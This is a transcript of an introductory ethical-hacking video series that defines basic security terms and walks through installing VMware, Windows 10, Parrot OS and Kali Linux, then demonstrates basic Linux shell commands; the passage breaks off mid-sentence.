Welcome back to our channel. So in today's session we'll discuss about the introduction to ethical hacking. Introduction to ethical hacking. So before going to this one, so why this ethical hacking comes into the latest trend? So because before going to that, let us know about the attack. So attack means action done unauthorizedly. Whatever the action done unauthorizedly is called as an attack. So if this action done on a computer machine or a data stored in a computer or a network, right? So then that we call it as a cyber attack. So this is called a cyber attack. So if the action done unauthorizedly on a computer or a data or a network, whatever it may be, so that type of attack we call it as a cyber attack. So we need to provide some security for all these things, because so nowadays we are depending upon the internet. So if you want to eat your favorite food, so we are moving on to the internet and we are keeping an order, right? So if you want to travel from one place to another place, so we are booking the tickets through the internet. So if you want to watch a movie, so we are going to the internet. So that means intentionally or unintentionally, so we are providing some data, right? So either it can be the personal data or a financial data. So this data can be a personal data or some financial data. So there might be a chance of unauthorized access for this particular data. So that process we call it as an attack, right? So we need to provide some security. So before providing the security, we need to find the weakness. So if there is any weakness, then only there is a chance of accessing this data unauthorizedly, right? So that we call it as a vulnerability. So vulnerability means, so it is a weakness. So this weakness can be on a computer, on a data or a network. Then only there is a possibility to get these things being attacked, right? So now what is a hacking? What is the process of hacking? So here hacking means unauthorizedly accessing either computer or data or a network. This process is called hacking. So I'll write here hacking. It is the process of gaining access on data or a machine or a software or some network, etc. Okay, of an individual or an organization So that is called a hacking. So it's a process of gaining the access on either data, computer, software, network, etc. of an individual or an organization. So that is called hacking. So that we call it as an unauthorized access. Unauthorized access. Right? Now, the person who does all these things, the person who does this hacking is known as a hacker. So hacker means a person who does the hacking, that means who gains the access unauthorizedly, is known as a hacker. So there are different types of hackings, and there are different types of hackers. So we'll discuss all of them in our further sessions, right? So but introduction part, coming to the introduction part, so if our data or a system or a network is having any weakness, then there might be a chance of having a attack. That means attack means action done unauthorizedly. So that we call it as a cyber attack. So this process of gaining access is called as hacking, and the person who does this one is a hacker. Now, so obviously the hacking is an offense. It's an illegal. Hacking is an illegal. So without taking the permission of an individual, gaining the access of his or her data is an illegal, right? So we call it as an offense. Then why we are calling it as a ethical hacking? So that's a question rises on my mind. So why we are calling it as ethical hacking? Ethical means it's illegal. So hacking itself is an offense. But we are saying that ethical hacking, right? So here the ethical hacking means doing the process legally. Ethical means legal, right? So here the hacking is offense. Obviously it's an offense. Offense means illegal, but ethical means it is a legal. It's a legal. So the process of gaining access unauthorizedly is a legal. So a little bit confusion is there, right? Let me explain you this one. Why we are calling it as an ethical hacking. See, hacking is unauthorized access. Unauthorized access of a data, computer, network, software, etc. Okay, just we have discussed this one, right? So this is called a hacking. But coming to the ethical, that means a legal. So all these things will be done with the permission of organizational head. So the unauthorized access of all these things for either individual or organization we call as a hacking. So coming to the organization, if the same thing done with the permission of organizational head, then we call it as a ethical hacking. So taking permission from the owner of the organization and getting the unauthorized access is called ethical hacking. But the question is, why to take the permission and why to access the data unauthorizedly? Yes. So this happens, that means the purpose of ethical hacking is to find the vulnerabilities. That means in order to find the weakness of the organization, either for the data or a system, so the company or the organizational head will give the permission for a person, that means a hacker, to gain the access, to do the hacking process. So the person who does this hacking ethically is known as ethical hacker. Right? Ethical hacker. So the ethical hacker will follow the same process how the hacking done, but that will be done with the help of permission from the organizational head. And the main purpose of doing this ethical hacking is to find the vulnerabilities. So if you know the weakness of a system, or if you know the weakness of a network, automatically they will take some preventive measures to overcome that particular vulnerabilities, right? They will patch the vulnerabilities, they will patch the weakness, right? So in order to find the vulnerabilities and in order to find the weakness of the organization will recruit a person and they'll make this hacking process. right? So this is called the ethical hacking. Simply we can say this ethical hacking as a pen testing or penetration testing. So this is for testing purpose, in order to find the weakness, in order to find the vulnerabilities, in order to find the possible threats. So this hacking will be done, right? So that is the difference between hacking and ethical hacking. So obviously the hacking will be the offense, and ethical hacking means from the permission of the organizational head, the hacking process will be done. So that's why we call it as an ethical hacking. So in today's session, we'll discuss about the basic terminologies that are being used in ethical hacking. So most of the things you might be know, and a few things you might not be known. So let me discuss about the definitions of all the basic terminologies like virus, malicious code, backdoor, phishing, malware, etc., etc. So today's session I'll explain, or I will completely give the definitions by typing in the Excel sheet, so that if anyone required this Excel, so it would be easy for me to share the Excel. So let's move on to the system. I'll type the definitions of all the basic terminologies which are being used in the ethical hacking. Hello friends. So now we'll see the basic terminologies that are being used in ethical hacking. So let me write down the complete definitions in the Excel. So this is the name we'll write, and let us take, this is the description box. Yes. So the first one is a attack. So we know that attack means getting the unauthorized action to a system or a network, so which is being called as an attack. So we can simply say it as unauthorized action taken on system or network. So we call it as a attack. And then backdoor. So this backdoor is to access, the name itself indicates, it is to access the computer system which bypasses the system security mechanism. So whatever the security mechanisms available in our system, it will be bypassed by this particular to gain the access is called a backdoor, right? So the ethical hacker will maintain this backdoor, right? So to access a computer system that bypasses the security mechanisms, that bypass security mechanisms, that's called a backdoor. And the next one is a brute force attack. So very important thing, there is a brute force attack. So this brute force attack is nothing but a trial and error method, right? So checking all possibilities. So if you want to crack a password, so you can check with all the possibilities. That is called a brute force attack. So this brute force attack uses trial and error methods. Error method to guess the login information or etc., whatever the thing. So not only the login information, anything. So if you want to guess something, so blindly it will go with the trial and error method. So that is called a brute force attack. And the next one is the exploit. This is also very important terminology which will be used in our further sessions in ethical hacking. That is the exploit. So this exploit is a program or an instruction that is designed to find the vulnerabilities available in the system, or to take the advantage of security flaw of a computer system. So it will find the vulnerabilities. Vulnerability means a weakness, right? So this exploit is a program which finds the weakness of a computer system or a network, and it will make an advantage to gain the access or unauthorized access, right? So this is a program or instructions
to find the weakness and take advantage of a flaw. Flaw means a weakness, right? Flaw in an application or a system, computer system. So it will find the vulnerabilities, it will find the weakness, and it will take an advantage of that particular weakness to gain the unauthorized access. So this terminology is very important because it will be used in our ethical hacking in our further sessions, right? The next one, firewall. Firewall. So all of you know about this firewall. So this is a network security devices that monitors all the incoming and outgoing network traffic. So it will allow only the authorized access, authorized traffic, and it will not allow the unauthorized access, right? So this firewall is a network device, which monitors all incoming and outgoing traffic and allows only authorized traffic. So it will not allow the unauthorized traffics, right? So that we call it as a firewall. And the next terminology is hacker. So the hacker is a person who finds the weakness and exploit and gains the access of target system. That means unauthorized access. So hacker is a person who finds the weakness and takes an advantage of the system, computer system, right? So that means unauthorized access. So the person who finds the weakness, right? So in order to find the weakness, we will be having a lot of tools. So we'll discuss all of them in our further sessions. So the person who do all the things is called a hacker. And the next one is a hacking, so which is similar to our hacker. So the process of finding the weakness is called a hacking. So the process of finding weakness of a system and gaining access unauthorizedly is called as a hacking. It's a process, and hacker is a person. And the next one is a key log or keystroke logging, or we can also simply say it as a key logging. So key logging or a keystroke logging, and this is a process which is used to record the keys done on the keyboard. So whatever the actions performed on the keyboard will be maintained in a log by using this keystroke logging, right? So in order to gain the access, in order to find the passwords or our financial information like credit card information which we are giving in our system using our keyboard, so everything will be maintained in a log. So this keystroke is an action of recording. It's an action of recording all the actions or all the keystrokes performed on our keyboard. So the keystrokes means whatever the information we are giving through the keyboard, everything will be recorded, so it will be maintained a log, right? So that process we call it as a keystroke logging or a key logging. The next one, malicious code. So malicious code is nothing but a virus. It's a virus, or we can also call it as an unwanted files or a program, so that can cause a harm to our computer or a data stored on a computer. So that's what happens with a virus, right? So malicious code is nothing but a group of viruses, right? So a group of viruses, a virus or unwanted files or programs, so which can harm or destroy data stored in our computer system, right? So malicious code is a group of virus. So the virus or worms or logic bombs or Trojan horse, everything comes under this malicious code, right? So that's why we can call it as a group of virus. Any virus will comes under this malicious code, right? So obviously the main objective of this virus is to harm or destroy the data which is being stored in our computer. So sometimes it may destroy our computer hardware also. It may destroy our computer hardware, not only the data, it can destroy the computer also. And the next one is malware, so which is similar to our malicious code. So this is also one terminology which is being used frequently in our further sessions. Malware is also a software, so which we call it as a intrusive software to damage the system or destroy data stored in our system, in our computer. Destroy the data stored in our computer. So similar to our malicious code, right? So similar to our malicious code, but one difference is malicious code means is a program or instructions. So a virus is also a instructions or a program, right? So malware is nothing but a software, okay, software which is designed to damage the system or destroy the data stored in our computer. And the next one is a phishing. So this is also one type of attack which will be we are going to use in our further systems. So phishing is an social engineering attack. So is also called as a social engineering attack, where an attacker sends a fraud message to a person in order to reveal sensitive data. So it's an attack which is where an attacker sends some sort of message. So that can be in terms of a hyperlinks or a normal message to a person and making that person to reveal the sensitive data. So by clicking on that particular link or by clicking on the software, so whatever it may be, so it makes a person to make a trust, and it makes a person to reveal all the sensitive data. So it is called a phishing attack, right? Next, a spoofing. This is also similar to our phishing attack. So it is a technique used to gain the unauthorized access. And here the attacker sends a message to a computer with an IP address indicating that the message is coming from the trusted host. So first it will make the person to feel the message is coming from the trusted host, and the attacker will gain the unauthorized access. So this is a technique used to gain unauthorized access by sending message with an IP indicating that a message is coming from trusted host. So that means the message is coming from the trusted host. It will make the person to feel that the message is coming from the trusted host, and the attacker will gain the unauthorized access. So that process we call it as a spoofing. So it's also similar to our phishing. Okay, it's also similar to our phishing attack. And the next one is a SQL injection. So the name itself indicates here it will use some malicious SQL code. So uses malicious SQL queries code for a backend database. Backend database. So obviously the database will be in the backend. So backend database to access the information, or to manipulate the information. So this is also an unauthorized access, right? But here the attack will be done on the database with the help of queries which are malicious. So this SQL injection will use the malicious SQL code for the backend databases to access the information. This is also an unauthorized access. And the next one is a threat. So threat is nothing but a possible danger to our computer, so which may destroy the data or system. So it's just a warning. Okay, there is a possibility to exploit our vulnerabilities, right? A threat is a possibility. Okay, it will show the possibility to gain the unauthorized access. And the next one is a Trojan. So this is a one type of malicious code. We can also call it as a Trojan horse. So this Trojan horse is also a type of computer virus that is camouflaged in the form of regular software. So similar to our spoofing. So spoofing means, so the attacker will send a message with an IP and indicating that the message is coming from the trusted host. But here, instead of sending a message, it will use a software, okay, which will be treated as a regular software. So which is not an unauthorized software, or it's not an virus, right? So it will treat as a regular software. So this is a type of computer software that is camouflaged. The camouflaged means just like our mirroring, right? Mirroring. Camouflaged in the form of a regular software. Right? So the attacker will use this software, okay, in order to inject some malicious code into our system with the means of a software. So it will be treated as a regular software. Okay, there will be no problem with that particular software, right? So that we call it as a Trojan horse. So that will also comes under our malicious code. And the next one is a vulnerability. So this vulnerability is a weakness that can be exploited by the attacker to gain unauthorized access. So whatever the attack, whatever the exploit we have discussed just now. So vulnerability is a weakness that can be identified by attacker or a hacker to gain unauthorized access. So that is called a vulnerability. So these are the basic terminology used in ethical hacking. So in our further sessions, you will be knowing about all these things. We are going to use all these terminologies, so directly or indirectly. So this is a basic terminology, and this is a terminology and description or definition. So this is all about our basic terminologies in ethical hacking. So hope you understood this one. So this will be very useful for our further sessions. So in this session, I would like to show you the installation of VMware Workstation. So first, let me explain you about this VMware Workstation. What is the importance of this one? So this workstation is used to install multiple operating systems as a virtual machines. So in our computer, we can install a multiple operating systems as a virtual workstations. I will show you first, and then I will show you the installation. So this is the icon of VMware Workstation 16 player. So just double click on that one. So it will be opened. See here you can observe I have installed the Kali Linux and Windows 10 as a virtual machines. So you can select either one. So you'll get a play button here. So if you play this virtual machine, so Kali Linux will be opened. See, so it will open the Kali Linux. So this is our operating system. In this, we are installing the virtual machine by installing the Kali Linux as a virtual machine, right? See, so this is an environment, right? Kali Linux environment. So it will prompt for the login. So while installing the Kali Linux, so we'll give the user ID and password. So the same thing we have to give and login so that the Kali Linux environment has been opened, right? So this is the environment. And if you want to get the full screen, so simply click this one. So this is a full screen. So whatever the commands we can implement in a Kali Linux, everything you can do. So you'll be having everything. So terminal, there will be there, text editor, there will be there. So you can use the terminal and you can use the commands. Okay, whatever the commands you can execute, everything you can execute here, right? So this is one thing. Okay, this is one thing. And if you want to shut down, just go to the shutdown. So automatically it will be closed. The virtual box will be closed. Similarly, so we can install a multiple operating systems in this VMware, right? See, Windows 10. So if you select this one and play virtual machine, automatically Windows 10 will be opened. So here my operating system is Windows 11, but I have installed Windows 10 as a virtual machine in my system, right? So if you play this one, automatically Windows 10 will be get opened, right? So this is the use of VMware Workstation. Now I will let you know how to install this VMware Workstation. So before that, let me remove all the operating systems which are available here, and then we'll go. And let me go to the control panel and let us delete the thing, uninstall the Workstation Pro. So here I am removing the VMware Workstation 16 player, and then I will show you the installation. So you can observe here, now we have already uninstalled this VMware. So go to the browser, so give VMware Workstation, so you will get a website VMware. So go to here, first link. So just you can see try Workstation 16 Pro, and here see 16 Pro for Windows. Yes, download now. So you need not worry. So it will be coming with the two options. One is a trial version, another one is for a paid version. If it is a trial version, we can use a non-commercial use. Okay, and it may take some time, so I'll cancel this one because already I have downloaded this one. So let us use the downloaded file. So in the downloads, you can find this one. See, VMware player. Just double click this one. So it will start its installation. See, workstation player 16. So preparing to install. You can observe here. So click on next. So accept the license agreement. Click on next. See, path. Okay. So add VMware Workstation console tools into my system path. So click on this one and check for product updates. Yes. Next. So create a desktop shortcut and a start menu. Yes. So install. So the installation has been started. Yes, so you can observe here completed. Click on finish. So you can use this VMware Workstation 16 player. So double click this one so that the VMware will be opened, and there you need to install the operating systems and you can run them as a virtual machines. Yes, see, so this is a VMware Workstation 16 player, and you can observe here non-commercial use only. So this is a non-commercial use, that means a trial version. So you can use this one. Okay, if you want to make it as a commercial, automatically here you can find out the link buy now. So you can click here and you can purchase this particular software for the commercial purpose. Right, so hope you understood this one, and in our further sessions I will show you how to install the operating systems in these virtual machines. So we'll install the Kali Linux, and I will show you how to install the Windows and Kali Linux in the virtual machines. Today's session will discuss about how to install an operating system in VMware Workstation. So in the previous sessions we have seen how to install the VMware Workstation, and also we have seen how can we install the Kali Linux in VMware. Now we'll see how to install the operating system, and all you need is an ISO file. So which operating system you want to install in VMware, so you need to get the ISO file from the internet, and then you can install that in VMware virtual machine, right? So first let us search for this one. So let us download the Windows 10 ISO file. So there will be many sources. From that source you can download the ISO file. So I'm downloading this one. So just click on this one. So the download will start. Once it was completed, then we have to install the this ISO file in VMware. So I'll stop it now because I have already downloaded this one. So let us start this installation. So only one thing you require, that is a ISO file, ISO image file, right? So click on the workstation player, and here so create a new virtual machine. So here you need to browse the ISO file. So here I am having the ISO file. So in my system, so this is a Windows 10 ISO. So double click on that one. So just click on next. So it was prompting about the Windows product key. You can skip this one. So you can change the path here. So I'll change the path where I just want to install that in this entertainment, and here I will create a new folder. So in this entertainment I'll create a new folder, and here I'll give VM Windows Win 10. Okay, so in that particular folder I'm going to install this one. So it will ask for the disk size. So that much capacity it will be allocated for that particular thing, right? So store a virtual disk as a single file. So I will give some 60 GB. So next, and click on finish. So automatically it will start installing the Windows operating system in our VMware workstation. So this is similar, which you have installed the operating system in your system, right? So desktop or a laptop. The same way, the procedure is same, but here we are installing the same operating system in virtual machine. So it may take some time. So waiting for connection. So the installation has been started. So it was started copying the Windows files. Then they'll get ready for the installation. Then actual installation will be started, and we have to wait until it completes all the things which are shown on the screen. So it was about to complete the installation process, and after that it will start installing the features and updates, and finally it will be finishing the installation process. So you can observe the installation is also done in a virtual mode, right? The system is not being restarted. Only the operating system, that means a virtual machine, will be get restarted. So you can observe, so the welcome page is being loaded. So the process may take some time. So you got the message. This might take several minutes, and don't turn off your PC. So here PC means our virtual machine. So the installation is almost done. So once again it was restarting, the final step. So you can observe the login page appeared here. See, finally we got the Windows screen. So now see, this is the operating system which we have installed in VMware Workstation. So actually in our system we are having the operating system Windows 11. So you can observe here Windows 11, right? But we have installed Windows 10. So this is Windows 10. So you can click on this one to get a full screen. So this is a Windows 10. You can observe here. So go to the properties of this one. You will get the operating system. See, this is the properties, and here you can be getting the version of Windows operating system. See, it's a Windows 10 Education Edition, right? So that means this operating system is available in virtual machine, right? So if you click on this one, again it will move with the short screen. So like this we can install. So here in this Windows 10 we are not having any MS Office. So if you try to open the Word, you'll be getting an error. So make sure you type the name correctly, because Windows can't find the Windows Word, right? But if you type the same thing in our system, so we'll get the Word file. So everything is same, but the only thing is it was virtually located in some place, right? So this is how we can install the Windows operating system. Not only the Windows, the Linux operating system is also same. So we can install the operating system in virtual machine. If you want to shut down, just click on this one. So it will be closed. That's it. And if you again want to work with the Windows operating system, Windows 10 operating system, click on the workstation player. So it will be opened, and here you can find the different virtual machines. So one is Kali Linux, which we have installed earlier, and Windows 10 just now we have installed. So select this one, you'll be getting the play. So click on play virtual machine, so that the Windows 10 will be getting loaded. So the complete process will be done, and the Windows 10 operating system will be loaded here, right? So this is how we can install any operating system in virtual machine, that means VMware Workstation. In this session we'll discuss how to install the Parrot operating system in the VMware. So first let us know about this Parrot operating system, and then I'll go with the installation process. So this Parrot operating system is similar to the Kali Linux, so which we have discussed in our previous sessions. So the ethical hackers will make use of this Kali Linux or this Parrot operating system in order to perform the vulnerability assessments or the penetration testings. So this operating system, Parrot operating system, is similar to the Kali Linux. It will come up with more than 600 tools which can be compatible, and we can easily install on this Parrot operating system, and also we can perform the penetration testing. And compared to the Kali Linux, this Parrot operating system is a lightweight process, and the installation is also very simple, and it also requires a very less RAM, right? So it's an open source. It will be available free of cost in the internet. Let us see what is what exactly this Parrot operating system, and I will go with the installation process. See, as I said, that Parrot operating system is similar to the Kali Linux and is an open source Debian based operating system, and this is a platform for the hacking. So mainly the ethical hacking means a penetration testing. So hackers can use this Parrot operating system to perform vulnerability assessments and penetration testing purpose. So as I said, that it requires a less RAM to function properly, and the complete installation is also lightweight. And this is an open source and free of cost. And all the tools of Kali Linux, a well-known operating system for penetration testing, are included in this Parrot security. Right? So in our previous sessions, we have seen about this Kali Linux. And the Parrot security operating system does not only has tools for ethical hacking and penetration testing, it also comes with a lot of powerful languages, compilers and interpreters, so that we can perform the programming. We can do the programming too. Right? So we'll go to the installation process. So just go with the official website. So go to the google.com and you just type here Parrot OS for VMware download. So the first one you can see parrotsec.org. Parrotsec means Parrot security. Okay, so just click on this one, and you'll be finding the download option here. See, you can find the download option here. The size of this file is around 4.8 GB. Just click on this download. So it will start downloading. See, here you can observe the downloading has been started, and already I have downloaded this file, so I'm cancelling this process. So you can observe my file is available in the downloads one. I'll go with the downloads, and here you can see Parrot security, right? So then just close this one and open the VMware. In the VMware itself, we are going to install the Parrot security. So this is a VMware. So in this VMware, in the previous sessions, we have discussed about the Kali Linux. We have already installed the Kali Linux. Now go to the create a new virtual machine. So just select this typical, which was recommended. So click on the next. You need to give the path of ISO file here. So installer disk image file is ISO, and whatever the software we have downloaded is a ISO file. You can observe the extension ISO. So just browse the file, browse the location where the file has been installed. So here you can see ISO. So click on that one and click on next, and here you need to select the operating system, and see, this is a Debian based operating system. I'll show you Parrot OS. So here you can observe, so Parrot OS is a Linux distribution based on Debian with a focus on security. So you can select this Debian operating system here. So just go with here. So there are different operating systems. So go with the Debian 64-bit and just click on next and give the name for the virtual machine. So I'll give Parrot OS and give the path where it should be installed. I'll install this one in the BEC folder. So in the BEC, I'll create a new folder called Parrot OS. Okay, so I'll select this one, okay, and click on next. See, recommended size for Debian 10x 64-bit is at 20 GB. I'll give it 20. So make sure that 20 GB is available in that particular drive. So single file, store a virtual disk as a single file, and click on the next and see, yes. So click on finish, and you can see the Parrot OS. So here, and just power on this virtual machine. So it will start loading this Parrot operating system. So you can try and install. Click on the first one. So it will start installing the Parrot operating system. So it may take some time. So meanwhile, if you like our channel, like, share our channel with your friends and subscribe to our channel. So you can see the Parrot OS is being loaded in our virtual machine. So whatever the thing we have done in the Kali Linux, everything can be done in this Parrot operating system also. So you can observe, so this is a Parrot operating system which has been installed in our in our VMware, and here you can browse the internet and you will be having a different tools. So here there is a menu in the left bottom. So click on this menu, you'll be having a lot of things available similar to our Windows operating system. So going with the programming, see, these are the programming interpreters and the compilers available, and see, services, these are the services, these are the system tools which are available, and these are the applications, so different applications. So these are the pen testing applications, information gathering tools, vulnerability analysis tools, web application tools, exploitation tools, okay, maintaining access, post exploitation, password attacks, wireless testing, sniffing and spoofing tools, digital forensics, automotive and reverse engineering tools, reporting tools, everything is available here. See, everything is here. So you can select everything in this menu or simply go with the application, and here you can go. And this is a terminal. So this is a terminal. So here you can use the commands to display the files and folders, and also you can use for the pen testing, right? Just close. And so hope you understood this installation of Parrot operating system. So in the previous session, I have shown you how to download and install the VMware Workstation. And in this session, I would like to show you how to install the Kali Linux in virtual machine, right? So just open the VMware Workstation. So here we need to install the Kali Linux, right? So in the next session, I will show you how to install the operating system, Windows operating system. But today I will show you how to download and install the Kali Linux. So go to the browser, open kali.org, which is a official website for Kali Linux. So you can see the download option. So click on the download. See, you'll get a different images. So go with the virtual machines, and here you will be finding the 64-bit and 32-bit. So VMware and VirtualBox. So our software is a VMware. So get this one. So this is a download. So get download. So here you can observe the download has been started, and now I will just cancel this one because already I have downloaded this in our system. So you will be having this file, the RAR file, Kali Linux 2022 RAR file, right? So after successful download, so you just unzip this one. Okay, so just unzip this one. See, you will be getting this one. So just unzip this particular file. So it may take some time. So I'll once again I'll cancel this one because already I have unzipped and I have stored in the softwares folder. So here you can find this Kali Linux VMware so and so, right? So this is the files we are having in that particular folder. Now after successful installation and after extracting the data from the RAR file, so go to the workstation, and here you simply open a virtual machine. So just find out the path where there is a Kali Linux. So in my system in the local disk. So software, Kali Linux, this one, and VMX. So select and open. So it will start playing. So here you got this one. You can observe here Kali Linux VMware. Play the virtual machine. Play the virtual machine. So automatically it will start loading the Kali Linux. See, you can observe here. See. So click on this one, Kali GNU or Linux. So it will start booting. Okay, it will load the Linux. And it will ask for the username and password. So by default, the username will be Kali and password will be Kali. So you can log in to your Kali Linux with the username and password as Kali, K-A-L-I. So this may take a few minutes. You can observe the Kali Linux is being loaded. So it will prompt for the login and password. See, here it's a login. K-A-L-I is a username and password is also K-A-L-I. And just click on login. So automatically the Kali Linux will be available in your virtual machine, right? See, so everything is being loaded here. So this is the environment. If you want to get it a full screen, in the top menu bar you can observe here the enter full screen mode. Click on this one. So it will be open in the full screen, and here you can open. See, this is a menu, and here you will be having a different options, and there you can observe the terminal. So you can click on the terminal so that the terminal will be open, and here just so here you can use the commands, different commands. Okay, here you can use the different commands, and this is a different formats. Okay, the different menus of a terminal. So you can use these different menus of the terminal, and you can execute this one. And if you want to get back here, so simply click on see, move the mouse cursor to the top of the screen, so you'll get the menu. So simply click on this exit full screen mode. So once again you'll be getting here, and if you want to log out, simply you can observe here the play button. So click on the drop down menu, and here shutdown guest. Okay, so click on the shutdown guest so that the Kali Linux will be exited. See, so are you sure you want to power off the virtual machine and exit? Yes. So you can observe the Kali Linux has been closed. Also the VMware also has been closed, right? So this is a very simple process to install a Kali Linux in our virtual machine. So if you want to execute a Kali Linux commands, simply you can use this virtual machine, VMware workstation, and you can install this Kali Linux, and you can make use of this VMware workstation to execute the commands of Kali Linux.
So in today's session, I would like to tell you the importance of Kali Linux. So before going to this particular Kali Linux, we know that the Linux environment is having more advantages over the Windows operating system, because this Linux environment will be coming with an open source platform, and more secure, less vulnerable, etc. Right? Because of these reasons, so the people were switching towards this Linux environment than the Windows environment. And in that Linux environment, there are different versions. And why just prefer this Kali Linux for the cyber security concepts? So because particularly this Kali Linux comes with preloaded tools which are used in information security tasks. So what are these information security tasks? So these are nothing but like a penetration testing, So penetration testing means checking out for the vulnerabilities, okay, and similarly vulnerability management, and password attacks, similarly wireless attacks, computer forensics, and reverse engineering, etc., etc., right? So for all these information tasks, there will be preloaded tools available in the Kali Linux. So this Kali Linux supports around more than 350 tools, 50 tools, okay, related to this information security task. So this is the major reason why the hackers will choose this Kali Linux. Okay, so already in the previous session I have explained you how to install the Kali Linux in our virtual machine. So now I will show you some of the tools which are already preloaded in this particular Kali Linux. Okay, so let's move on to the tool.
Hello friends. So just now we have seen the importance of Kali Linux and why the hackers will choose this Kali Linux to perform the cybersecurity attacks. And now I will show you the tools which are preloaded with the Kali Linux environment. So in the previous session we have already shown you how to install the Kali Linux in our virtual machine. So I'll post the link in the description. So with the playlist name as ethical hacking, so you can go through that to install a Kali Linux in the virtual machine. So after that, just log into the Kali Linux, and here you can observe the menu. So here the applications, see. So move your mouse to the corner so you can get the tooltip, the applications. So click on that applications, and these are the different applications or tools which are preloaded while installation of Kali Linux. See, these are the information gathering tools. So if you go with this information gathering, there are a lot of tools available to gather the information of the target systems, right? So with the help of these preloaded tools, we can gather the information. Similarly, vulnerability analysis. So in order to get the vulnerabilities, you can use this application, web application analysis. So these are the several tools related to this web application analysis, database assessment tools, password attack tools, wireless attack tools, reverse engineering, the exploitation tools. So in order to check out the vulnerabilities and run the payloads, and sniffing and spoofing tools, post exploitation, forensics, reporting, and social engineering tools. See, these are all the different applications available, and for each and every application there are many tools available. So all these are preloaded with the Kali Linux environment. So apart from this Kali Linux also support more than 350 plus tools, as we have discussed just now. So we can also install those tools in this Kali Linux which are not available in this particular list, right? So in our further sessions, I'll cover the basic terminologies which will be used in ethical hacking. So because moving towards the different tools, using these tools, you must know the basic terminologies. So we'll see the basic terminologies, and then we'll see some of the tools which are used for cybersecurity attacks. So in the further sessions, we'll see all those things. And one important thing is, so this hacking is just for the educational purpose. So don't try it on other machines. So just try with your own machine itself. So in the further sessions, we'll see more concepts related to the ethical hacking.
So in the previous sessions, we have discussed about the importance of Kali Linux and how to install the Kali Linux in the virtual machine. And in today's session, we'll discuss about the various basic commands which are being used in the working of Kali Linux. So these are the very important commands because these are the commands we are going to use in our further sessions, right? So I will demonstrate each and every command by executing in the Kali Linux. So let's move on to the system.
Hello friends. So we'll see the commands available in the Kali Linux. So these are a very few commands. There will be many commands available in Kali Linux, and these are the very few commands. So now I'm going to explain these commands. So I'll demonstrate each one by executing them in the Kali Linux. So I have already logged into this Kali Linux in the VMware. So open the terminal and here you can execute the commands. So coming to the first one, that's cal, C-A-L. C-A-L command is used to display the month's formatted calendar. In order to display the calendar, we'll go with this cal command. See, C-A-L, and press enter. It will give the current month calendar. It's a November 2022. If you need it for a particular year, so you can give the year so that you will be getting the complete year calendar 2021. So calendar August 2022, so it gives the August 2022. So calendar followed by CAL followed by the month and followed by the year. So CAL August 1984, so it gives the 1984 August calendar, right? So this is the command used to display the calendar if you need a particular month or a particular year. Next one is a who displays the information of users, various users logged into the system. So actually we are having only one user, right? So so there are two users, one is a Kali and another one is a TTY7. So two users have logged into our system. And similarly, the next one is a who am I, displays the active user ID. That means whatever the current user ID. So who am I, that means present working user. So present working user is a Kali. So we have logged in by using this Kali user, right? So that's why it gives the Kali. But who gives the all the users? Okay, who am I gives the active user. That's the difference. And the next one is a ls command. So I think you will be familiar with the ls command. It lists all the files and directories of a particular folder. So here you can give ls. So it gives all the files and folders, right? So these are all folders. Okay, so downloads, camfish, desktop, documents, cam hacker, so k linux, pictures, all these are the different folders, and tester.py, sundeep.gz, and these jpg files, all these are the files. Okay, so ls gives both the folders as well as the files and directories. We call them as a directories. And mkdir is used to create a directory. I think these commands you are familiar. So if not, no problem, because all these commands are similar to our Linux commands. So mkdir is used to make the directory. If you want to create one more directory, then you have to use this mkdir. See, mkdir, I'll give Saradhi. So you can observe there is no folder with the name Saradhi here. So we are having some Saradhi. So let us take one more thing. So Sundeep _ Saradhi. So this is my folder name. I'm creating a folder. Okay. So in that folder we can create a number of files. Right. So this is a folder. mkdir is used to create a folder. Sundeep _ Saradhi. If you click enter, automatically that folder will be created. So to check that one, again you can press ls. So you can observe Sundeep _ Saradhi is a folder which was created just now, mkdir. So in this folder we can save different files. In this folder we can save different files. So mkdir is used to create a folder, and cd is for changing the directory. If you want to change the directory, so you can observe here a tilde symbol, that is a normal home page. Okay, so if you go with the cd, give the folder name just now we have created, you can observe now we are in the folder Sundeep Saradhi. If you want to create any file, that files will be stored in this particular folder itself. Okay, and if you want to get back, simply go with the cd space dot. Automatically it will get back. Okay, so get back to the parent folder. So change folder in order to work in that particular folder. The cd command is used to change the folder, and the cat command is used to create a file or display the content of a file. So we can create a file or we can display the file. So for example, so first we need to know how to create a file. So how to create a file? We can use a VI editor in order to create a file, or touch, which is nothing but it creates an empty file, See, let us open the file vi sample.txt. So it will open the VI editor. So vi is the command used to open the editor. So here you will be having, it is a screen editor that comes with a practically every Unix system. That means, so it opens an editor, text editor, so you can create a file here. Okay, so go with the this VI editor will comes with different modes, two modes. So one is a command mode and insert mode. So we need to go with the insert mode, and you have to enter the text. So already I have explained the complete VI editor in the previous sessions. So I will post the link in the description. You can go through that. There are different options in order to create a file, in order to work with the file using the VI editor, right? So what are the options? What are the commands? Everything I have explained in that session. So I'll post the link in the description. So you just go through that and get an idea about the VI editor. So first I'll go to the insert mode by pressing I, and here you can give the text. So hello friends, welcome to basic Kali Linux commands. Thank you. So after that, go to the command mode by pressing escape. So colon WQ, which quit by saving the file, right? Save and quit. Now you can observe we have created this file in the root, right? So go with the ls. So here you can find sample.txt. You can find the sample.txt. And now enter into the folder which we have created now. So cd, so Sundeep _ Saradhi. And in order to create here, so again go with the same thing, or you can use a touch demo.txt. It will give then empty file. It will create an empty file. See, so here you can press ls. So there is an empty file demo.txt. Okay, so this is an empty file. And if you want to add more amount of data, you can edit by using the VI editor. Just we have seen in the sample.txt. And see, that is about our cat. So cat is to display the information, right? So here you can use cat demo.txt. So there is nothing because it's an empty file. Now go to the back, and here print ls. So type use a ls. So here you are having some sample.txt. You can check cat sample.txt, so that the content which is available in this txt file will be displayed here. And this cat function is also used to create one more file, right? See, cat sample.txt redirected to new sample.txt. So obviously whatever the data available in this sample.txt will be stored in new sample.txt, which was created. So you can observe here there is no file with the name sample new_sample.txt. There is only one file, that is a sample.txt. But here by using the cat command and by using the redirection, we are giving the output of sample.txt into another file name as a new_sample.txt. So which will be created now. So now you can observe ls. There will be two files, new sample.txt and sample.txt. And if you want to know the content of that particular file, use a cat sample.txt. It will display the content. Similarly, cat new sample.txt, it will also be having the same thing, because we have redirected the content of sample.txt to new sample.txt, right? So in such a way, we can use the cat command to create a file or to display the content of file. So creation will be done with the help of a redirection symbols, right? And rm is used to remove the specified file. So we can, if you want to remove the file, for example ls, so we are having a lot of files. So I just want to remove the new sample.txt. Simply use rm new sample.txt. So which will remove the complete file of new underscore sample. So if you observe ls, so there will be no file name with a new underscore sample because it was removed by using the 